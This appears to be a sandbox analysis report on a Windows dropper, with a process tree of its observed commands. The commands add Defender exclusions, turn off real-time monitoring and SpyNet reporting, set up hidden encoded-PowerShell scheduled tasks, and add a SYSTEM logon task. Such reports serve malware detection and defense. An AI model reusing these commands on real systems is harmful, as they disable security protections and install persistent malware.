description pid Process procid_target PID 1148 wrote to memory of 1964 1148 file.exe 26 PID 1148 wrote to memory of 1964 1148 file.exe 26 PID 1148 wrote to memory of 1964 1148 file.exe 26 PID 1148 wrote to memory of 1964 1148 file.exe 26 PID 1148 wrote to memory of 1964 1148 file.exe 26 PID 1148 wrote to memory of 1964 1148 file.exe 26 PID 1148 wrote to memory of 1964 1148 file.exe 26 PID 1964 wrote to memory of 1564 1964 Install.exe 27 PID 1964 wrote to memory of 1564 1964 Install.exe 27 PID 1964 wrote to memory of 1564 1964 Install.exe 27 PID 1964 wrote to memory of 1564 1964 Install.exe 27 PID 1964 wrote to memory of 1564 1964 Install.exe 27 PID 1964 wrote to memory of 1564 1964 Install.exe 27 PID 1964 wrote to memory of 1564 1964 Install.exe 27 PID 1564 wrote to memory of 1816 1564 Install.exe 29 PID 1564 wrote to memory of 1816 1564 Install.exe 29 PID 1564 wrote to memory of 1816 1564 Install.exe 29 PID 1564 wrote to memory of 1816 1564 Install.exe 29 PID 1564 wrote to memory of 1816 1564 Install.exe 29 PID 1564 wrote to memory of 1816 1564 Install.exe 29 PID 1564 wrote to memory of 1816 1564 Install.exe 29 PID 1564 wrote to memory of 1788 1564 Install.exe 31 PID 1564 wrote to memory of 1788 1564 Install.exe 31 PID 1564 wrote to memory of 1788 1564 Install.exe 31 PID 1564 wrote to memory of 1788 1564 Install.exe 31 PID 1564 wrote to memory of 1788 1564 Install.exe 31 PID 1564 wrote to memory of 1788 1564 Install.exe 31 PID 1564 wrote to memory of 1788 1564 Install.exe 31 PID 1816 wrote to memory of 1308 1816 forfiles.exe 33 PID 1816 wrote to memory of 1308 1816 forfiles.exe 33 PID 1816 wrote to memory of 1308 1816 forfiles.exe 33 PID 1816 wrote to memory of 1308 1816 forfiles.exe 33 PID 1816 wrote to memory of 1308 1816 forfiles.exe 33 PID 1816 wrote to memory of 1308 1816 forfiles.exe 33 PID 1816 wrote to memory of 1308 1816 forfiles.exe 33 PID 1788 wrote to memory of 408 1788 forfiles.exe 34 PID 1788 wrote to memory of 408 1788 forfiles.exe 34 PID 1788 wrote to memory of 408 1788 forfiles.exe 34 PID 1788 wrote to memory of 408 1788 forfiles.exe 34 PID 1788 wrote to memory of 408 1788 forfiles.exe 34 PID 1788 wrote to memory of 408 1788 forfiles.exe 34 PID 1788 wrote to memory of 408 1788 forfiles.exe 34 PID 408 wrote to memory of 1728 408 cmd.exe 35 PID 408 wrote to memory of 1728 408 cmd.exe 35 PID 408 wrote to memory of 1728 408 cmd.exe 35 PID 408 wrote to memory of 1728 408 cmd.exe 35 PID 408 wrote to memory of 1728 408 cmd.exe 35 PID 408 wrote to memory of 1728 408 cmd.exe 35 PID 408 wrote to memory of 1728 408 cmd.exe 35 PID 1308 wrote to memory of 1652 1308 cmd.exe 36 PID 1308 wrote to memory of 1652 1308 cmd.exe 36 PID 1308 wrote to memory of 1652 1308 cmd.exe 36 PID 1308 wrote to memory of 1652 1308 cmd.exe 36 PID 1308 wrote to memory of 1652 1308 cmd.exe 36 PID 1308 wrote to memory of 1652 1308 cmd.exe 36 PID 1308 wrote to memory of 1652 1308 cmd.exe 36 PID 1308 wrote to memory of 1488 1308 cmd.exe 37 PID 1308 wrote to memory of 1488 1308 cmd.exe 37 PID 1308 wrote to memory of 1488 1308 cmd.exe 37 PID 1308 wrote to memory of 1488 1308 cmd.exe 37 PID 1308 wrote to memory of 1488 1308 cmd.exe 37 PID 1308 wrote to memory of 1488 1308 cmd.exe 37 PID 1308 wrote to memory of 1488 1308 cmd.exe 37 PID 408 wrote to memory of 1860 408 cmd.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1148 -
C:\Users\Admin\AppData\Local\Temp\7zS66B0.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1964 -
C:\Users\Admin\AppData\Local\Temp\7zS6B42.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1816 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1308 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1652
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1488
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1788 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:408 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1728
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1860
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gGOoyTKZe" /SC once /ST 06:25:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1556
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gGOoyTKZe"4⤵PID:1600
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gGOoyTKZe"4⤵PID:532
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bNHXguvSZYiOwSiXLC" /SC once /ST 20:17:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\QEJzPCsOgNeEaNF\UfogBZe.exe\" 3x /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2032
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {D20CD7E8-B4B8-4D39-ACC3-4F958C7DC2E1} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]1⤵PID:1992
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2012 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:632
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1308 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1520
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1752 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1652
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1716 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1104
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1984
-
C:\Windows\system32\taskeng.exetaskeng.exe {4695AADF-40CE-4974-BA00-2C55DC7FB112} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:980
-
C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\QEJzPCsOgNeEaNF\UfogBZe.exeC:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt\QEJzPCsOgNeEaNF\UfogBZe.exe 3x /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1812 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gFDdlwQrn" /SC once /ST 03:11:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1736
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gFDdlwQrn"3⤵PID:340
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gFDdlwQrn"3⤵PID:1092
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:744
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1984
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1596
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:1612
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gsWVROtgn" /SC once /ST 13:43:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1276
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gsWVROtgn"3⤵PID:1084
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gsWVROtgn"3⤵PID:1604
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:323⤵PID:572
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:384
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:643⤵PID:1684
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1484
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:323⤵PID:808
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:324⤵PID:1428
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:643⤵PID:368
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:644⤵PID:1592
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\MYjwJFnMfsmfKHMw\fcXgZafF\uwulXbRkAtJKHwdB.wsf"3⤵PID:2004
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\MYjwJFnMfsmfKHMw\fcXgZafF\uwulXbRkAtJKHwdB.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1960 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATZmuaBwNwmU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATZmuaBwNwmU2" /t REG_DWORD /d 0 /reg:644⤵PID:1720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QYiUKrukFVUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1724
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QYiUKrukFVUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:992
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SHsJRQZsU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1752
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SHsJRQZsU" /t REG_DWORD /d 0 /reg:644⤵PID:1076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aJAQLsoDkiWqC" /t REG_DWORD /d 0 /reg:324⤵PID:676
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aJAQLsoDkiWqC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:432
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR" /t REG_DWORD /d 0 /reg:324⤵PID:456
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1192
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fxkldoUMcXUSOxVB" /t REG_DWORD /d 0 /reg:324⤵PID:1436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fxkldoUMcXUSOxVB" /t REG_DWORD /d 0 /reg:644⤵PID:880
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt" /t REG_DWORD /d 0 /reg:324⤵PID:1092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1984
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:368
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1276
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATZmuaBwNwmU2" /t REG_DWORD /d 0 /reg:324⤵PID:1544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ATZmuaBwNwmU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1720
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QYiUKrukFVUn" /t REG_DWORD /d 0 /reg:324⤵PID:768
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QYiUKrukFVUn" /t REG_DWORD /d 0 /reg:644⤵PID:1736
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SHsJRQZsU" /t REG_DWORD /d 0 /reg:324⤵PID:320
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SHsJRQZsU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1076
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aJAQLsoDkiWqC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:676
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\aJAQLsoDkiWqC" /t REG_DWORD /d 0 /reg:644⤵PID:1860
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:456
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\obbvPdCxLMZjlJoeoAR" /t REG_DWORD /d 0 /reg:644⤵PID:1056
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fxkldoUMcXUSOxVB" /t REG_DWORD /d 0 /reg:324⤵PID:580
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fxkldoUMcXUSOxVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt" /t REG_DWORD /d 0 /reg:324⤵PID:1692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\kVuqSqHMACBMgWqnt" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1092
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:324⤵PID:2004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\MYjwJFnMfsmfKHMw" /t REG_DWORD /d 0 /reg:644⤵PID:1612
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gsKZRafOi" /SC once /ST 12:06:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1468
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gsKZRafOi"3⤵PID:1496
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gsKZRafOi"3⤵PID:432
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:672
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1256
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1056
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:464
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VgOpnHVQDAdMZqNFB" /SC once /ST 16:26:34 /RU "SYSTEM" /TR "\"C:\Windows\Temp\MYjwJFnMfsmfKHMw\EsLoLFOmOLSjFdG\byNSWcF.exe\" aF /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:808
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "VgOpnHVQDAdMZqNFB"3⤵PID:1592
-
-
-
C:\Windows\Temp\MYjwJFnMfsmfKHMw\EsLoLFOmOLSjFdG\byNSWcF.exeC:\Windows\Temp\MYjwJFnMfsmfKHMw\EsLoLFOmOLSjFdG\byNSWcF.exe aF /site_id 525403 /S2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
PID:1296 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bNHXguvSZYiOwSiXLC"3⤵PID:1424
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:2004
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:1612
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:1020
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:656
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\SHsJRQZsU\RrHmtJ.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "DNDvMcbpefrYjKZ" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1732
-
-
